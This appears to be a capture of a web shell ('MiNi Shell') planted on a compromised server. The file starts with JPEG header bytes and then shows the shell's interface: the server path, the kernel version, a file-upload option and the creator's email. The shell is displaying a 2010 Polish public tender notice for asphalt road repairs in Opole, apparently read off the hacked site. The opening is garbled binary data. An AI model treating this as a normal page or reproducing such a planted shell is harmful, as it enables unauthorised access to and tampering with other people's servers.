JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100126/23144-N-2010.html

<p class="kh_header"><b>Opole: Wykonanie remontów nawierzchni drogowych o nawierzchni bitumicznej mieszankami mineralno-asfaltowymi wytwarzanymi i wbudowanymi na gorąco na drogach powiatowych administrowanych przez ZDP Opole w 2010 r  z podziałem na 3 zadania</b><br>
<b>Numer ogłoszenia: 23144 - 2010; data zamieszczenia: 26.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych w Opolu , ul. Strzelców Bytomskich 7, 45-084 Opole, woj. opolskie, tel. 077 44-14-069 (70), faks 077 44-14-071.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie remontów nawierzchni drogowych o nawierzchni bitumicznej mieszankami mineralno-asfaltowymi wytwarzanymi i wbudowanymi na gorąco na drogach powiatowych administrowanych przez ZDP Opole w 2010 r  z podziałem na 3 zadania.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Zamówienie obejmuje wykonywanie remontów nawierzchni betonem asfaltowym na gorąco
na drogach powiatowych (kategoria ruchu  KR2 i KR3/średni i ciężki /wymienionych w pkt 1,   w ramach zadań nr 1 - 3 oraz  w przypadku wystąpienia takiej potrzeby, także wykonanie :  
frezowania  nawierzchni (koleiny , garby i inne nierówności )  ,  odnowy (wykonanie nakładki   nowej warstwy ścieralnej z  betonu asfaltowego ),    zgodnie ze specyfikacjami  technicznymi wraz  z przedmiarem robot (DP) i kosztorysem  / ślepym / ofertowym .stanowiących  załączniki  do   SIWZ.
Wykonawca gwarantuje  zastosowanie materiałów  spełniających wymogi określone w  specyfikacji technicznej .
Wykonawca zobowiązany będzie , bez względu na liczbę powierzonych mu zadań , do  wykonania w terminie do dnia  30 czerwca   2010 r.,w ramach tzw. wiosennego  porządkowania dróg  -  zakresu remontów oraz innych niezbędnych robót wymienionych na  wstępie , a poza tym terminem - remontów  i   innych niezbędnych robót wymienionych na  wstępie zgłaszanych z  7- dniowym wyprzedzeniem  przez Kierownika Obwodu Drogowego  Dąbrowa. , Kotórz Mały , Chrząstowice ..

2.W ramach zamówienia Wykonawca  zobowiązany jest także do :
      -    opracowania stosownego projektu oznakowania robót i uzyskania jego akceptacji 
            przez Zamawiającego ( ewentualnie innych organów )
      -    wykonania i utrzymania oznakowania w trakcie prowadzenia robót oraz  jego rozbiórki 
      po ukończeniu robót
-	zorganizowania odbioru odpadów których stał się wytwórcą  podczas  wykonywania remontów i pokrycia kosztów ich odwozu i składowania .
     -    zapewnienia bezpiecznej przeprawy pieszych przez teren robót.

3. Dopuszcza się zlecania podwykonawcy wszelkich robót poza robotami drogowymi. 

4.Ustala się okres rękojmii na wykonane roboty - 12 miesięcy.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.31.42-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Wykonawca zapewni jako część swojej oferty (tylko dla zadań, o które się będzie ubiegał) wadium w wysokości: - Zadanie Nr 1 - 3800,00 - zł - Zadanie Nr 2 - 5400,00 - zł - Zadanie Nr 3 - 2200,00 - zł. 2.Wadium musi być wniesione przed upływem terminu składania ofert w jednej lub kilku następujących formach, w zależności od wyboru Wykonawcy: a. pieniądzu, przelewem na rachunek bankowy: PKO  BP SA I  O/Opole  nr  94 1020 3668 0000 5902 0015 8857 b. poręczeniach bankowych ; c. poręczeniach pieniężnych spółdzielczych kas oszczędnościowo- kredytowych ; d. gwarancjach bankowych; e. gwarancjach ubezpieczeniowych; f. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz.U. z 2007 , Nr 42, poz. 275 ). 3.Wadium wnoszone w formie poręczeń lub gwarancji powinno być złożone w oryginale i musi obejmować cały okres związania ofertą. 4.Wadium wniesione w pieniądzu przelewem na rachunek bankowy musi wpłynąć na wskazany w pkt. 2.a) rachunek bankowy Zamawiającego najpóźniej przed upływem terminu składania ofert.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> WARUNKI UDZIAŁU W POSTĘPOWANIU I SPOSÓB DOKONYWANIA OCENY ICH SPEŁNIENIA : 1.W postępowaniu mogą brać udział , Wykonawcy niepodlegający wykluczeniu na podstawie art. 24 ust. 1 ustawy Pzp oraz spełniający niżej określone warunki udziału w postępowaniu ; 2. Warunki udziału w postępowaniu określone w oparciu o art. 22 ust. 1 ustawy Pzp ; 2.1 ,,Wiedza i Doświadczenie,, - Opis sposobu dokonywania oceny spełnienia tego warunku : 

-	wykonawca (lub partnerzy konsorcjum łącznie) wykonał w  okresie ostatnich 5 lat  przed dniem wszczęcia postępowania  (a jeżeli okres działalności jest krótszy - w tym okresie) roboty o podobnym charakterze tj. w zakresie remontów oraz odnów nawierzchni dróg
-	
a)	 o wartości:  dla Zadania Nr 1   co najmniej    700.000 zł 
                           dla Zadania Nr 2  co najmniej  1.000.000 zł 
                           dla Zadania Nr 3  co najmniej     400.000 zł,

       (a więc dla trzech zadań łącznie co najmniej 2.100.000 zł , )

b)	      w ilości: dla Zadania Nr 1   co najmniej   24.000 m2
                           dla Zadania Nr 2  co najmniej    33.000 m2
                           dla Zadania Nr 3  co najmniej    14.000 m2 

      (a więc dla trzech zadań łącznie co najmniej  71.000 m2)
        - co winno być potwierdzone dokumentami stwierdzającymi , że roboty te wykonane
          zostały zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone

2.2	Potencjał techniczny - sprzęt  do wykonania zamówienia 

Opis sposobu dokonywania oceny spełnienia tego warunku .

Wykonawca musi mieć do dyspozycji wymagane w SIWZ jednostki sprzętu.  
Wykonawca może polegać na sprzęcie innych podmiotów niezależnie od charakteru prawnego łączącego go z nimi stosunków .
W takiej sytuacji Wykonawca zobowiązany jest udowodnić zamawiającemu , iż będzie dysponował sprzętem niezbędnymi do realizacji zamówienia a w szczególności przedstawi w tym celu pisemne zobowiązanie tych  podmiotów do oddania mu do dyspozycji tego sprzętu na okres korzystania z niego przy wykonywaniu zamówienia .
         
           Tak więc    Wykonawca (lub partnerzy łącznie)  musi dysponować w pełni sprawnymi   
           narzędziami i  urządzeniami ,  wymaganymi w Szczegółowych Specyfikacji  
           Technicznych (SST), 
  tym co najmniej ( bez względu na ilość zadań ) :

-	zestaw walców do zagęszczania - co najmniej: 
1)	stalowy wibracyjny 10-14 Mg - 1 szt
                2)  ogumiony min. 10 Mg              - 1 szt
-    płyta do zagęszczania - 1 szt 
-	rozkładarka mas bitumicznych - 1 szt
-	przecinarka z diamentową tarczą tnącą do cięcia asfaltu - 1 szt
-	skrapiarka - 1 szt
-	frezarka do nawierzchni bitumicznych - 1 szt
-	wytwórnia mas  bitumicznych lub zapewniony dostęp do zakupu
masy bitumicznej z innej wytwórni

2.3	Osoby zdolne do wykonania zamówienia 

Opis sposobu dokonywania oceny spełnienia tego warunku .

Wykonawca musi mieć do dyspozycji osoby legitymujące się doświadczeniem                               i kwalifikacjami odpowiednimi do stanowisk jakie zostaną im powierzone .
Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów niezależnie od charakteru prawnego łączącego go z nimi stosunków .
W takiej sytuacji Wykonawca zobowiązany jest udowodnić zamawiającemu , iż będzie dysponował osobami niezbędnymi do realizacji zamówienia a w szczególności przedstawi w tym celu pisemne zobowiązanie tych  podmiotów do oddania mu do dyspozycji niezbędnych osób na okres korzystania z nich przy wykonywaniu zamówienia .

           Wykonawca przedstawi  w ofercie osoby do pełnienia funkcji :     
          w tym co najmniej  
           -   (osobno dla każdego  z zadań Nr 1,2,3) - majstra robót bitumicznych z co  
               najmniej 5-letnim stażem pracy  i min. 2-letnim doświadczeniem na tym stanowisku
               (a więc dla trzech zadań łącznie co najmniej 3 majstrów  - jw.)



2.4	Sytuacja ekonomiczna i finansowa
     Opis sposobu dokonywania oceny spełnienia tego warunku .
Wykonawca (lub partnerzy konsorcjum łącznie) musi wykazać , że posiada  
średnioroczny obrót w okresie ostatnich 3 lat obrotowych / 2007 , 2008 , 2009 /  (a  
jeżeli okres działalności jest krótszy - łączny obrót w tym okresie podzielony przez 3)   
w wysokości 
                           dla Zadania Nr 1   co najmniej  1.100.000 zł 
                           dla Zadania Nr 2   co najmniej  1.700.000 zł 
                           dla Zadania Nr 3   co najmniej      700.000 zł 

       (a więc dla trzech zadań łącznie co najmniej 3.500.000 zł)


    3. Informacja dla Wykonawców wspólnie ubiegających się o udzielenie zamówienia ( spółki cywilne/konsorcja ) - W przypadku tych Wykonawców, żaden z nich nie może podlegać wykluczeniu na podstawie art. 24 ust. 1 ustawy Pzp, natomiast warunki określone w pkt. 2.1. , 2.2. i 2.3 muszą spełniać łącznie ; 4. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia - nie spełnia . Podstawą oceny spełniania warunków udziału będą w szczególności wymagane dokumenty i oświadczenia ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.1	INFORMACJE O OŚWIADCZENIACH I DOKUMENTACH , JAKIE MAJĄ DOSTARCZYC WYKONAWCY W CELU POTWIERDZENIA SPEŁNIENIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIE PODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY PZP . 1 W celu wykazania spełnienia przez Wykonawcę warunków udziału w postępowaniu , określonych w oparciu o art. 22 ust. 1 ustawy Pzp Wykonawcy powinni przedłożyć następujące dokumenty (oryginały lub kserokopie poświadczone przez Wykonawcę za zgodność z oryginałem): 1.1. Oświadczenie o spełnianiu warunków udziału w postępowaniu zgodne z treścią Formularza nr 3.1.
1.2	Wykaz wykonanych ( zakończonych ) robót w zakresie niezbędnym do spełnienia warunku wiedzy i doświadczenia w okresie ostatnich pięciu  lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie z podaniem ich wartości , przedmiotu , dat wykonania i odbiorców na formularzu zgodnym z treścią Załącznika nr 4  . Informacja musi potwierdzać spełnienie warunku,  o którym mowa w pkt VIII.2.1   niniejszej Instrukcji dla Wykonawców.                                       
Do informacji winny być dołączone dokumenty  stwierdzające , że roboty te wykonane zostały zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone

1.3 Wykaz sprzętu   w celu realizacji zamówienia wraz z informacja o podstawie  
      dysponowania tymi  zasobami na formularzu zgodnym z treścią Załącznika nr 5
 1.3.1.Jeżeli Wykonawca wskaże jednostki sprzętu do  wykonania zamówienia innych  
      podmiotów  niezależnie od charakteru prawnego łączącego go z nimi stosunków to w   
      takiej sytuacji   Wykonawca zobowiązany jest udowodnić zamawiającemu , iż będzie  
      dysponował  sprzętem  niezbędnymi do realizacji zamówienia a w szczególności  
      przedstawi w tym celu:   
      pisemne zobowiązanie tych  podmiotów do oddania mu do dyspozycji niezbędnych  
      jednostek sprzętu na   okres korzystania z niego  przy wykonywaniu zamówienia .

1.4	Wykaz osób  , które będą uczestniczyć w wykonywaniu zamówienia , wraz z  informacjami na temat ich kwalifikacji  zawodowych , doświadczenia  i wykształcenia  niezbędnych do wykonania zamówienia , a także zakresu wykonywanych przez nich czynności na formularzu zgodnie z treścią załącznika nr 6
1.4.1.Jeżeli Wykonawca wskaże osoby  zdolne  do wykonania zamówienia innych podmiotów  
     niezależnie od charakteru prawnego łączącego go z nimi stosunków to w  takiej sytuacji  
     Wykonawca zobowiązany jest udowodnić zamawiającemu , iż będzie dysponował  
      osobami niezbędnymi do realizacji zamówienia a w szczególności przedstawi w tym celu:   
      pisemne zobowiązanie tych  podmiotów do oddania mu do dyspozycji niezbędnych  
     osób na   okres korzystania z nich przy wykonywaniu zamówienia .

  1.5  Dane  finansowe (załącznik nr 7   )

2.	W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 Ustawy Pzp należy przedłożyć :
 
2.1 a)   Oświadczenie Wykonawcy / ów ( legitymujących się KRS-em ) o braku podstaw  
            do wykluczenia  w oparciu o  art. 24 ust.1  Ustawy Pzp na Formularzu 3.2.a 
lub

2.1 . b) Oświadczenie Wykonawcy/ów  ( osoby fizyczne  legitymujące się np.  wpisem do
           ewidencji  działalności gospodarczej )  o braku podstaw do wykluczenia  podstawie 
           art.24  ust. 1 Ustawy Pzp ze szczególnym uwzględnieniem art. 24 ust. 1 pkt. 2
           Formularz 3.2 b   

 2.2. Aktualny odpis z właściwego rejestru  jeżeli odrębne przepisy wymagają wpisu do rejestru w  celu wykazania braku podstaw do wykluczenia w oparciu o art. 24ust. 1 pkt. 2 Ustawy    wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert., a w stosunku  do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt. 2 Ustawy Pzp ( oświadczenie to  zawarte będzie w Formularzu 3.2 b )

3.    Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej   Polskiej, zamiast dokumentów, o których mowa  w pkt  2 składa dokument lub dokumenty  określone w § 4 Rozporządzenia Prezesa Rady Ministrów  z dnia 30 grudnia 2009 r w sprawie   rodzajów dokumentów , jakich może żądać zamawiający od wykonawcy , oraz form w jakich te  dokumenty mogą być składane ( Dz. U. Nr 226 z 2009 r poz. 1817 ) 
 
4.   W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w celu   
      potwierdzenia spełnienia warunków wymaganych od Wykonawców składających   
      wspólną  ofertę:
a)	oświadczenie wymienione w pkt 1.1. winno być złożone w imieniu wszystkich Wykonawców składających wspólną ofertę i podpisane przez ustanowionego                                    pełnomocnika do ich reprezentowania, 
b)	dokumenty wymienione w pkt 1.2 - 1.5 składa  w imieniu wszystkich ten, lub ci spośród Wykonawców składających wspólną   ofertę, którzy spełniają warunki określone w pkt  VIII.2  i uczestniczyć będą w  realizacji zamówienia w zakresie  odpowiadającym postawionym warunkom.
c)	oświadczenie wymienione w pkt 2.1.a lub 2.1.b  winno być złożone  przez każdego Wykonawcę
d)	dokumenty wymienione w pkt 2.2. . albo odpowiadające im określone w pkt .3.  winny być złożone przez każdego Wykonawcę; 
 
Wykonawcy wspólnie ubiegający się o zamówienie winni ustanowić pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zwarcia umowy w sprawie niniejszego zamówienia..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.powiatopolski.pl...<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Z podanej strony internetowej lub w Siedzibie zamawiajacego - pok nr 7 - bezpłatnie , po uprzednim zapotrzebowaniu..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.02.2010 godzina 08:50, miejsce: Zarząd Dróg Powiatowych w Opolu 45-084 Opole, ul. Strzelców Bytomskich 7 - sekretariat..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie remontów cząstkowych oraz odnowy warstwy ścieralnej nawierzchni bitumicznych mieszankami mineralno-bitumicznymi wytwarzanymi i wbudowanymi na gorąco ,warstwy ścieralnej z betonu asfaltowego oraz frezowania na drogach powiatowych administrowanych przez Zarząd Dróg Powiatowych w Opolu w 2010 r - Obwód Drogowy w m. Dąbrowa.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie  remontów cząstkowych oraz odnowy warstwy ścieralnej  nawierzchni bitumicznych mieszankami mineralno-bitumicznymi wytwarzanymi i wbudowanymi na gorąco w ilości około 
950 m2 remontów cząstkowych i 6500 m2 warstwy ścieralnej  z betonu asfaltowego oraz frezowania w ilości około 480 m2   na drogach powiatowych administrowanych przez Zarząd Dróg Powiatowych w Opolu w 2010  r   - Obwód Drogowy w m. Dąbrowa -.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.31.42-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.10.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie remontów cząstkowych oraz odnowy warstwy ścieralnej nawierzchni bitumicznych mieszankami mineralno-bitumicznymi wytwarzanymi i wbudowanymi na gorąco ,warstwy ścieralnej z betonu asfaltowego oraz frezowania na drogach powiatowych administrowanych przez Zarząd Dróg Powiatowych w Opolu w 2010 r - Obwód Drogowy w m. Kotórz Mały..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie  remontów cząstkowych oraz odnowy warstwy ścieralnej  nawierzchni bitumicznych mieszankami mineralno-bitumicznymi wytwarzanymi i wbudowanymi na gorąco w ilości około 
1240 m2 remontów cząstkowych i 9550 m2 warstwy ścieralnej  z betonu asfaltowego oraz frezowania  w ilości około  300 m2   na drogach powiatowych administrowanych przez Zarząd Dróg Powiatowych w Opolu w 2010 r   - Obwód Drogowy w m. Kotórz Mały -.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.31.42-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.10.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonanie remontów cząstkowych oraz odnowy warstwy ścieralnej nawierzchni bitumicznych mieszankami mineralno-bitumicznymi wytwarzanymi i wbudowanymi na gorąco ,warstwy ścieralnej z betonu asfaltowego oraz frezowania na drogach powiatowych administrowanych przez Zarząd Dróg Powiatowych w Opolu w 2010 r - Obwód Drogowy w m. Chrząstowice..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie  remontów cząstkowych oraz odnowy warstwy ścieralnej  nawierzchni bitumicznych mieszankami mineralno-bitumicznymi wytwarzanymi i wbudowanymi na gorąco w ilości około 
550  m2 remontów cząstkowych i 4000  m2 warstwy ścieralnej  z betonu asfaltowego  oraz frezowania w ilości około 250 m2  na drogach powiatowych administrowanych przez Zarząd Dróg Powiatowych w Opolu w 2010 r   - Obwód Drogowy w m. Chrząstowice.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.31.42-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.10.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com